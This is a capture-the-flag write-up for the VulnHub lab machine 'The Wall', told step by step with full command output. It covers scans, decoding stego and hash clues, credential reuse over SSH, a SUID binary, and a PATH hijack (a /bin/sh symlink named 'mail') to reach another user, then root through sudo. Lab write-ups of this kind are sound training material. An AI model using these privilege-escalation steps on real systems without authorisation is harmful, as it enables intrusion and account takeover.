The Wall VulnHub Writeup
Xerubus released a new VM recently, named 'The Wall', in tribute to 50 years of Pink Floyd. This is my writeup for it - let's get started!
First things first, an nmap scan. Nada.
I fire up WireShark, and filter on the targets IP address. I notice that every 10 seconds, the target attempts to connect back to us on port 1337. My guess is there's some sort of host discovery / connect back going on on the target.
After listening on port 1337 on my test machine, I wait a few seconds and get a connect back.
$ nc -v -l 0.0.0.0 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.104] port 1337 [tcp/*] accepted (family 2, sport 32762)
.u!"`
.x*"`
..+"NP
.z"" ?
M#` 9 , ,
9 M d! ,8P'
R X.:x' R' ,
F F' M R.d'
d P @ E` ,
ss P ' P N.d'
x '' '
X x .
9 .f ! . $b
4; $k / dH $f
'X ;$$ z . MR :$
R M$$, : d9b M' tM
M: #'$L ;' M `8 X MR
`$;t' $F # X ,oR t Q;
$$@ R$ H :RP' $b X @'
9$E @Bd' $' ?X ; W
`M' `$M d$ `E ;.o* :R ..
` ' "' ' @' '$o*"'
The Wall by @xerubus
-= Welcome to the Machine =-
If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice
We simply get kicked out after this message. Checking WireShark again, I note that a HTTP request was made. I got lucky here - I had attempted to visit the target while nmap was running, and it just so happens the browser attempted (every so often) to reconnect, after the first failed attempt.
After visiting port 80 - I get a heart warming image presented to me.
Dawwwh - look at their little faces. I find nothing of interest in the image.
I note from the HTTP response, the server is apparently running on OpenBSD.
HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 539
Content-Type: text/html
Date: Fri, 27 Nov 2015 19:37:53 GMT
Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT
Server: OpenBSD httpd
I check the source of the page.
<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>
<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall
Did you know? The Publius Enigma is a mystery surrounding the Division Bell album. Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.
737465673d3333313135373330646262623337306663626539373230666536333265633035-->
That last string looks like a hex value. After decoding, I get the following.
steg=33115730dbbb370fcbe9720fe632ec05
Another hex value. The key 'steg' stands out. The only other piece of evidence we have is the image so far. I'm guessing there's some information hidden in the image, and this is the key to the retrieval of this information.
The value above looks like an MD5 hash. After putting it into CrackStation, I get a single hit - the phrase 'divisionbell'. I use this as the passphrase when using steghide to extract information from the JPG.
$ steghide extract -p divisionbell -sf evidence-1.jpg
wrote extracted data to "pink_floyd_syd.txt".
$ cat pink_floyd_syd.txt
Hey Syd,
I hear you're full of dust and guitars?
If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0
Roger
Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd. The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.
Awesome. So, we've now got a Base64 encoded string (which decodes to 'SydBarrett') and another MD5 hash (which gives a single hit of 'pinkfloydrocks'). The only place we can provide a login currently is on the web server, so I attempt to pass in the username of 'SydBarret' with the password of 'pinkfloydrocks' as a basic auth pair.
After prodding about, I see that all PHP files appear to return a 403 error. I attempted to provide the login as a basic auth pair, but didn't receive a challenge, so I'm guessing this error is due to file permissions, instead of a htpasswd rule.
Running out of options, I decide to run another nmap scan. It really doesn't feel like these credentials can be used on the web server.
$ nmap -p0-65535 -sT -T5 -A -v 192.168.57.104
Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-27 22:32 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating ARP Ping Scan at 22:32
Scanning 192.168.57.104 [1 port]
Completed ARP Ping Scan at 22:32, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 13.00s elapsed
Initiating Connect Scan at 22:32
Scanning 192.168.57.104 [65536 ports]
Discovered open port 80/tcp on 192.168.57.104
Discovered open port 1965/tcp on 192.168.57.104
Completed Connect Scan at 22:33, 54.18s elapsed (65536 total ports)
Initiating Service scan at 22:33
Scanning 2 services on 192.168.57.104
Completed Service scan at 22:35, 96.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.104
NSE: Script scanning 192.168.57.104.
Initiating NSE at 22:35
Completed NSE at 22:35, 7.21s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for 192.168.57.104
Host is up (0.0017s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http OpenBSD httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open ssh OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
| 2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_ 256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.00%I=7%D=11/27%Time=5658DA4F%P=x86_64-unknown-linux-gnu%
SF:r(GetRequest,2D9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nCon
SF:tent-Length:\x20539\r\nContent-Type:\x20text/html\r\nDate:\x20Fri,\x202
SF:7\x20Nov\x202015\x2021:56:24\x20GMT\r\nLast-Modified:\x20Sat,\x2024\x20
SF:Oct\x202015\x2015:20:23\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\n\r\n<h
SF:tml>\n<body\x20bgcolor=\"#000000\">\n<center><img\x20src=\"pink_floyd\.
SF:jpg\"</img></center>\n</body>\n</html>\n\n\n<!--If\x20you\x20want\x20to
SF:\x20find\x20out\x20what's\x20behind\x20these\x20cold\x20eyes,\x20you'll
SF:\x20just\x20have\x20to\x20claw\x20your\x20way\x20through\x20this\x20dis
SF:guise\.\x20-\x20Pink\x20Floyd,\x20The\x20Wall\n\nDid\x20you\x20know\?\x
SF:20The\x20Publius\x20Enigma\x20is\x20a\x20mystery\x20surrounding\x20the\
SF:x20Division\x20Bell\x20album\.\x20\x20Publius\x20promised\x20an\x20unsp
SF:ecified\x20reward\x20for\x20solving\x20the\x20\nriddle,\x20and\x20furth
SF:er\x20claimed\x20that\x20there\x20was\x20an\x20enigma\x20hidden\x20with
SF:in\x20the\x20artwork\.\n\n737465673d33333131353733306462626233373066636
SF:26539373230666536333265633035-->\n\n")%r(HTTPOptions,218,"HTTP/1\.0\x20
SF:405\x20Method\x20Not\x20Allowed\r\nDate:\x20Fri,\x2027\x20Nov\x202015\x
SF:2021:56:24\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\nConnection:\x20clos
SF:e\r\nContent-Type:\x20text/html\r\nContent-Length:\x20376\r\n\r\n<!DOCT
SF:YPE\x20html>\n<html>\n<head>\n<title>405\x20Method\x20Not\x20Allowed</t
SF:itle>\n<style\x20type=\"text/css\"><!--\nbody\x20{\x20background-color:
SF:\x20white;\x20color:\x20black;\x20font-family:\x20'Comic\x20Sans\x20MS'
SF:,\x20'Chalkboard\x20SE',\x20'Comic\x20Neue',\x20sans-serif;\x20}\nhr\x2
SF:0{\x20border:\x200;\x20border-bottom:\x201px\x20dashed;\x20}\n\n--></st
SF:yle>\n</head>\n<body>\n<h1>405\x20Method\x20Not\x20Allowed</h1>\n<hr>\n
SF:<address>OpenBSD\x20httpd</address>\n</body>\n</html>\n")%r(RTSPRequest
SF:,218,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x20Fri,\x20
SF:27\x20Nov\x202015\x2021:56:24\x20GMT\r\nServer:\x20OpenBSD\x20httpd\r\n
SF:Connection:\x20close\r\nContent-Type:\x20text/html\r\nContent-Length:\x
SF:20376\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n<title>405\x20Method\x
SF:20Not\x20Allowed</title>\n<style\x20type=\"text/css\"><!--\nbody\x20{\x
SF:20background-color:\x20white;\x20color:\x20black;\x20font-family:\x20'C
SF:omic\x20Sans\x20MS',\x20'Chalkboard\x20SE',\x20'Comic\x20Neue',\x20sans
SF:-serif;\x20}\nhr\x20{\x20border:\x200;\x20border-bottom:\x201px\x20dash
SF:ed;\x20}\n\n--></style>\n</head>\n<body>\n<h1>405\x20Method\x20Not\x20A
SF:llowed</h1>\n<hr>\n<address>OpenBSD\x20httpd</address>\n</body>\n</html
SF:>\n");
MAC Address: 08:00:27:F2:2B:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 5.X
OS CPE: cpe:/o:openbsd:openbsd:5
OS details: OpenBSD 5.0 - 5.4
Uptime guess: 0.000 days (since Fri Nov 27 22:35:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Randomized
TRACEROUTE
HOP RTT ADDRESS
1 1.72 ms 192.168.57.104
NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.42 seconds
Raw packets sent: 47 (4.644KB) | Rcvd: 11 (612B)
What's that - port 1965 is open, and it's an SSH server? Jack pot.
$ ssh -p 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.57.104 closed.
Crap..
Sydd
So we've got a valid login for the system, but it only supports SFTP access. Let's have a sniff around.
$ sftp -P 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Connected to 192.168.57.104.
sftp> ls -alh
drwxr-x--- 0 0 1000 512B Oct 24 21:16 .
drwxr-x--- 0 0 1000 512B Oct 24 21:16 ..
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail
-rw-r--r-- 0 0 1000 1.9K Oct 25 22:56 bio.txt
-rw-r--r-- 0 0 1000 849K Oct 24 17:17 syd_barrett_profile_pic.jpg
sftp> ls -alh .mail
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail/.
drwxr-x--- 0 0 1000 512B Oct 24 21:16 .mail/..
drwxr-xr-x 0 0 1000 512B Nov 11 10:25 .mail/.stash
-rw-r--r-- 0 0 1000 309B Oct 24 19:18 .mail/sent-items
sftp> ls -alh .mail/.stash
drwxr-xr-x 0 0 1000 512B Nov 11 10:25 .mail/.stash/.
drwxr-xr-x 0 0 1000 512B Oct 24 19:17 .mail/.stash/..
-rw-r--r-- 0 0 1000 46.6M Aug 7 15:33 .mail/.stash/eclipsed_by_the_moon
sftp> ls -alh .mail/sent-items
-rw-r--r-- 0 0 1000 309B Oct 24 19:18 .mail/sent-items
There a few files we can check out here. I download them all and get to work.
bio.txt unsurprisingly has a biography of Syd Barrett, and the JPG is a picture of the good man himself.
The file eclipsed_by_the_moon however, is an archive.
$ file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix
Within this gzip is a tar..a tar.gz one might say.
$ tar zxvf eclipsed_by_the_moon.tar.gz
eclipsed_by_the_moon.lsd
$ file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector
So we've got a file system here. I use foremost to extract anything of interest.
$ foremost -v eclipsed_by_the_moon.lsd
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Fri Nov 27 22:53:46 2015
Invocation: foremost -v eclipsed_by_the_moon.lsd
Output directory: /home/test/Downloads/wall/eclipsed_by_the_moon.exc/output
Configuration file: /etc/foremost.conf
Processing: eclipsed_by_the_moon.lsd
|------------------------------------------------------------------
File: eclipsed_by_the_moon.lsd
Start: Fri Nov 27 22:53:46 2015
Length: 47 MB (49283072 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00000418.jpg 123 KB 214016
*|
Finish: Fri Nov 27 22:53:47 2015
1 FILES EXTRACTED
jpg:= 1
------------------------------------------------------------------
Foremost finished at Fri Nov 27 22:53:47 2015
We've got a single file that foremost managed to extract - an image.
It's Roger! And there's our password - hello_is_there_anybody_in_there.
$ ssh -p1965 RogerWaters@192.168.57.104
RogerWaters@192.168.57.104's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015
.u!"`
.x*"`
..+"NP
.z"" ?
M#` 9 , ,
9 M d! ,8P'
R X.:x' R' ,
F F' M R.d'
d P @ E` ,
ss P ' P N.d'
x '' '
X x .
9 .f ! . $b
4; $k / dH $f
'X ;$$ z . MR :$
R M$$, : d9b M' tM
M: #'$L ;' M `8 X MR
`$;t' $F # X ,oR t Q;
$$@ R$ H :RP' $b X @'
9$E @Bd' $' ?X ; W
`M' `$M d$ `E ;.o* :R ..
` ' "' ' @' '$o*"'
$
Roger
What does Mr Waters keep in his home directory, I wonder..
$ ls -alh
total 176
drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 RogerWaters RogerWaters 87B Oct 24 17:35 .Xdefaults
-rw-r--r-- 1 RogerWaters RogerWaters 773B Oct 24 17:35 .cshrc
-rw-r--r-- 1 RogerWaters RogerWaters 103B Oct 24 17:35 .cvsrc
-rw-r--r-- 1 RogerWaters RogerWaters 398B Oct 26 04:01 .login
-rw-r--r-- 1 RogerWaters RogerWaters 175B Oct 24 17:35 .mailrc
-rw-r--r-- 1 RogerWaters RogerWaters 218B Oct 24 17:35 .profile
drwx------ 2 RogerWaters RogerWaters 512B Oct 26 03:56 .ssh
-rw-r--r-- 1 RogerWaters RogerWaters 2.8K Oct 26 08:57 bio.txt
-rw-r--r-- 1 RogerWaters RogerWaters 0B Oct 28 05:02 mbox
-rw-r--r-- 1 RogerWaters RogerWaters 47.0K Oct 26 06:16 roger_waters_profile_pic.jpg
-rw-r--r-- 1 RogerWaters RogerWaters 16.2K Oct 26 06:23 secret-diary
After some time of digging through Rogers personal items, I checked out the other users on the system - no surprises here.
$ ls -lah /home
total 28
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 .
drwxr-xr-x 13 root wheel 512B Oct 24 18:03 ..
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 DavidGilmour
drwx------ 3 NickMason NickMason 512B Aug 8 00:33 NickMason
drwx------ 3 RichardWright RichardWright 512B Nov 27 02:02 RichardWright
drwx------ 3 RogerWaters RogerWaters 512B Oct 28 09:29 RogerWaters
drwxr-xr-x 4 root SydBarrett 512B Oct 24 18:03 SydBarrett
What was a nice surprise was that two of these users have binaries owned by them, with the SUID bit set.
$ find / -user NickMason 2>/dev/null
/home/NickMason
/usr/local/bin/brick
$ ls -lah /usr/local/bin/brick
-rws--s--x 1 NickMason NickMason 7.1K Aug 8 00:33 /usr/local/bin/brick
$ find / -user DavidGilmour 2>/dev/null
/home/DavidGilmour
/usr/local/bin/shineon
$ ls -lah /usr/local/bin/shineon
-rwsr-s--- 1 DavidGilmour RichardWright 7.3K Oct 25 07:58 /usr/local/bin/shineon
Looks like we've got our next step. Seeing as we're only able to execute one of these binaries, let's move on.
The Wall
I go ahead and execute /usr/local/bin/brick
$ /usr/local/bin/brick
What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ whoami
NickMason
Well, that was unexpected, but welcome. We're now one with Nick.
Nick Mason
After logging in, I have a bit of a dig about.
$ ls -alh /home/NickMason/
total 1576
drwx------ 3 NickMason NickMason 512B Aug 8 00:33 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 NickMason NickMason 87B Oct 24 17:34 .Xdefaults
-rw-r--r-- 1 NickMason NickMason 773B Oct 24 17:34 .cshrc
-rw-r--r-- 1 NickMason NickMason 103B Oct 24 17:34 .cvsrc
-rw-r--r-- 1 NickMason NickMason 398B Oct 24 17:34 .login
-rw-r--r-- 1 NickMason NickMason 175B Oct 24 17:34 .mailrc
-rw-r--r-- 1 NickMason NickMason 218B Oct 24 17:34 .profile
drwx------ 2 NickMason NickMason 512B Oct 28 04:48 .ssh
-rw-r--r-- 1 NickMason NickMason 1.3K Oct 26 08:58 bio.txt
-rw-r--r-- 1 NickMason NickMason 0B Oct 28 05:02 mbox
-rw-r--r-- 1 NickMason NickMason 749K Aug 8 00:33 nick_mason_profile_pic.jpg
$ cat bio.txt
"Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time".
Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States.
He competes in auto racing events, such as the 24 Hours of Le Mans.
On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)."
I wander if anyone is reading these bio's? Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces. I was just having a joke. Anyhow, I have now added you to thewall. You're username is obvious. You'll find your password in my profile pic.
Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason)
Read that bio carefully..yeah..
I copy out the bio image, and try to open it up..turns out it is not a profile pic.
$ file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I
After listening to the playback, I can hear some morse code in the background.
.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-
This translates to..
RICHARDWRIGHT1943FARFISA
After a number of attempts, I hit on the right password for the user - 1943farfisa. Annoyingly, you cannot SSH in with the RichardWright user - you can only SU to it from another user on the system.
Richard Wright
Before we check out the binary we found previously, I have a sniff around Richards home directory.
$ ls -alh
total 84
drwx------ 3 RichardWright RichardWright 512B Nov 27 02:02 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 RichardWright RichardWright 87B Oct 24 17:35 .Xdefaults
-rw-r--r-- 1 RichardWright RichardWright 773B Oct 24 17:35 .cshrc
-rw-r--r-- 1 RichardWright RichardWright 103B Oct 24 17:35 .cvsrc
-rw-r--r-- 1 RichardWright RichardWright 398B Oct 24 17:35 .login
-rw-r--r-- 1 RichardWright RichardWright 175B Oct 24 17:35 .mailrc
-rw-r--r-- 1 RichardWright RichardWright 218B Oct 24 17:35 .profile
drwx------ 2 RichardWright RichardWright 512B Oct 28 09:29 .ssh
-rw-r--r-- 1 RichardWright RichardWright 2.2K Oct 26 09:00 bio.txt
-rw-r--r-- 1 RichardWright RichardWright 990B Oct 27 01:46 mbox
-rw-r--r-- 1 RichardWright RichardWright 17.8K Oct 27 01:52 richard_wright_profile_pic.jpg
The bio contains standard stuff, and the profile picture..well, it's a profile picture.
It appears that Richard has mail.
$ cat mbox
From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015
Return-Path: DavidGilmour@thewall.localdomain
Delivered-To: RichardWright@thewall.localdomain
Received: from localhost (thewall.localdomain [local])
by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19
for <RichardWright@thewall.localdomain>;
Tue, 27 Oct 2015 01:41:18 +1000 (AEST)
From: David Gilmour <DavidGilmour@thewall.localdomain>
Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST)
Message-Id: <9059884549097248741.enqueue@thewall.localdomain>
To: RichardWright@thewall.localdomain
Subject: Re: Brain Damage
Status: RO
G'day Rick.. how's the ivory tickling going?
There's plenty of bricks in the wall, so I'll give you a few when we catch up.
For now, just use that command I gave you with the menu.
Dave
----------
Hey Dave,
I feel like we're back in the studio for The Dark Side of the Moon.
Sorry to keep bugging you, but can you tell me again how to do things
when I'm on thewall.
Rick
This email references a command - I'm guessing that's the binary we found eariler. Let's check it out.
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
After calling strings on the binary, I can see one path that is not correctly limited to a static path - mail. A rather crude way of finding the vulnerability, but effective.
$ strings /usr/local/bin/shineon
/usr/libexec/ld.so
OpenBSD
OpenBSD
libc.so.80.1
printf
__stack_smash_handler
__srget
getc
puts
system
_thread_atfork
environ
__progname
__cxa_atexit
__sF
__isthreaded
scanf
_Jv_RegisterClasses
__got_start
__got_end
__data_start
_edata
__bss_start
__progname_storage
__fini
__init_tcb
QRP1
[^_]
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail
Creating a symbolic link in the /tmp directory, then overriding the PATH, I can get a shell as David Gilmour.
$ ln -s /bin/sh /tmp/mail
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ cd
mail: cd: /home/RichardWright - Permission denied
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
On to the man of the hour.
David Gilmour
Once again, I check out his home directory.
$ cd /home/DavidGilmour/
$ ls -lah
total 408
drwx------ 4 DavidGilmour DavidGilmour 512B Oct 28 09:28 .
drwxr-xr-x 7 root wheel 512B Oct 24 17:36 ..
-rw-r--r-- 1 DavidGilmour DavidGilmour 87B Oct 24 17:36 .Xdefaults
-rw-r--r-- 1 DavidGilmour DavidGilmour 773B Oct 24 17:36 .cshrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 103B Oct 24 17:36 .cvsrc
-rw-r--r-- 1 DavidGilmour DavidGilmour 398B Oct 24 17:36 .login
-rw-r--r-- 1 DavidGilmour DavidGilmour 175B Oct 24 17:36 .mailrc
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 26 11:44 .private
-rw-r--r-- 1 DavidGilmour DavidGilmour 218B Oct 24 17:36 .profile
drwx------ 2 DavidGilmour DavidGilmour 512B Oct 28 05:16 .ssh
-rw------- 1 DavidGilmour DavidGilmour 384B Aug 8 00:33 anotherbrick.txt
-rw-r--r-- 1 DavidGilmour DavidGilmour 1022B Oct 26 08:59 bio.txt
-rwxr----- 1 DavidGilmour DavidGilmour 178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r-- 1 DavidGilmour DavidGilmour 785B Oct 27 01:43 mbox
There's nothing of real interest here, apart from the file anotherbrick.txt.
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond
New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php
# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
Upon reflection, we could of bypassed these steps entirely by reading this path from /etc/httpd.conf.org, but that wouldn't of been any fun now, would it?
As a matter of procedure, I check the profile image for strings.
who_are_you_and_who_am_i
This looks like a password to me. I try to use it to login as DavidGilmour.
$ login
login: DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
Let's move on to this URL.
50 Years of the Floyd
Upon visiting the URL, we're presented with a lovely page, dedicated to 50 Years of Pink Floyd.
The menu items here link to index.php, with a parameter of 'page'.
<li><a href="?page=home">Home</a></li>
<li><a href="?page=about">About</a></li>
<li><a href="?page=albums">Albums</a></li>
<li><a href="?page=contact">Contact</a></li>
My first guess is a LFI vulnerability. After numerous attempts, I move away from the web application, as I can't seem to get anything of use out of it.
I start exploring the filesystem, including the web root. From this, we find a previously unknown directory named 'welcometothemachine'.
$ ls -alh /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x 2 root welcometothemachine 512B Aug 8 00:33 .
drwxr-x--- 4 www welcometothemachine 512B Nov 27 01:47 ..
-rws--s--- 1 root welcometothemachine 7.3K Nov 27 01:47 PinkFloyd
Ok - all that we can do is run this binary.
$ /var/www/htdocs/welcometothemachine/PinkFloyd
/var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: test
Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Either we need to exploit this, or we need to guess the password.
After performing some enumeration, it appears to bug out after receiving more than 50 characters as input.
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Abort trap
Unfortunately, the option that prevents core dumps on SUID binaries is enabled.
$ sysctl kern.nosuidcoredump
kern.nosuidcoredump=1
I was stuck on this stage for quite some time. After going back over my notes, and checking all the evidence, I noticed that I hadn't actually taken a look at the image from the last web page.
Now, I found nothing of interest in the exif data, but I noticed an abnormality at the bottom of the image. After modifying the levels slightly in GIMP, we see the following.
My first thought that this was an MD5 hash, but it is actually a HEX representation of a string.
50696e6b466c6f796435305965617273 = PinkFloyd50Years
I try using this as the password for the above binary, but receive the 'Access Denied' message again. I proceed to try the hex string itself, and am met by a different message!
$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273
Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless
Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
Unsure as to what this actually did, I look for any files that have been modified within the past 10 minutes.
$ find / -mmin -10 2>/dev/null
/home/RogerWaters
/dev/bpf0
/dev/ttyp0
/dev/ptyp0
/dev/null
/etc/sudoers
/var/cron/log
/var/db/dhclient.leases.pcn0
/var/log/daemon
/var/log/messages
So, the sudoers file has been updated. I re-check our sudo permissions.
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"
User DavidGilmour may run the following commands on thewall:
(ALL) SETENV: ALL
Boo-ya! We can use sudo to execute any command, as any user. Time to get our flag.
$ sudo su
# cd /root
# ls -lah
total 48
drwx------ 5 root wheel 512B Nov 27 02:04 .
drwxr-xr-x 14 root wheel 512B Oct 24 18:03 ..
-rw-r--r-- 1 root wheel 87B Aug 16 18:25 .Xdefaults
-rw-r--r-- 1 root wheel 578B Aug 16 18:25 .cshrc
-rw-r--r-- 1 root wheel 94B Aug 16 18:25 .cvsrc
-rw-r--r-- 1 root wheel 328B Aug 16 18:25 .login
-rw-r--r-- 1 root wheel 468B Aug 16 18:25 .profile
drwx------ 2 root wheel 512B Nov 27 05:01 .ssh
-rw-r--r-- 1 root wheel 2.7K Nov 27 01:07 flag.txt
drwxr-xr-x 2 root wheel 512B Nov 14 02:43 scripts
drwxr-xr-x 2 root wheel 512B Oct 27 03:10 tmp
# cat flag.txt
"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"
Congratulations on rooting thewall!
___________________________________________________________________
| | | | | | | | | | |
|_|_______|_______|______ '__ ___|_______|_______|_______|_______|_|
| | | | | ) / | | | |
|_____|_______|_______|__ |,' , . | | _ , ___|_______|_______|_____|
| | | | ,| | |\ | | ,' | | | | |
|_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
| | | | \ _' ' ` | \ | | | |
|_____|_______|_______|_ ,-'_ _____ | _______|_______|_______|_____|
| | | | ,-'| _ | | | | | |
|_|_______|_______|__ ,-|-' | ,-. \ /_.--. _____|_______|_______|_|
| | | | | | | V | ) | | | |
|_____|_______|_______|_ | _ |-'`-' | | ,' _|_______|_______|_____|
| | | | | | ' ;' | | | |
|_|_______|_______|______"|_____ _,- o'__|_______|_______|_______|_|
| | | | _,-' . | | | |
|_____|_______|_______|_ _,--'\ _,-'_____|_______|_______|_____|
| | | | ' ||_||-' _ | | | | |
|_|_______|_______|_______|__ || ||,-' __|_______|_______|_______|_|
| | | | | ||_,-' | | | |
|_____|_______|______.|_______.__ ___|_______|_______|_______|_____|
| | | | \ | / | | | | |
|_|_______|_______|___ \ __|___ /, _ | | ______|_______|_______|_|
| | | | \ // \ | | | | | |
|_____|_______|_______|_ \ /\ //--'\ | | __|_______|_______|_____|
| | | | ' V/ | |-' |__, | | | |
|_|_______|_______|_______|_______ _______'_______|_______|_______|_|
| | | | | | | | | |
|_____|_______|_______|_______|_______|_______|_______|_______|_____|
|_________|_______|_______|_______|_______|_______|_______|_______|_|
Celebrating 50 years of Pink Floyd!
Syd Barrett (RIP), Nick Mason, Roger Waters,
